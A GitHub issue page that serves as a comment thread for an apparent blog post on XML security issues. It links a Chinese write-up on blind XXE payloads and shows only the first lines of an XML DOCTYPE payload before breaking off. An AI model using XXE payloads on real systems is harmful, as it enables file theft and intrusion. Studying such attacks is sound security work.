aspirepigshadow / gittalk

0 stars 0 forks source link

XML相关安全问题 | Aspirepig #5

Open aspirepigshadow opened 3 years ago

aspirepigshadow commented 3 years ago

https://aspirepig.cn/2021/11/01/xml-xiang-guan-an-quan-wen-ti/

利用payload,盲注 https://blog.csdn.net/nzjdsds/article/details/98763063 <?xml version="1.0"?>

<!DOCTYPE ANY[

&lt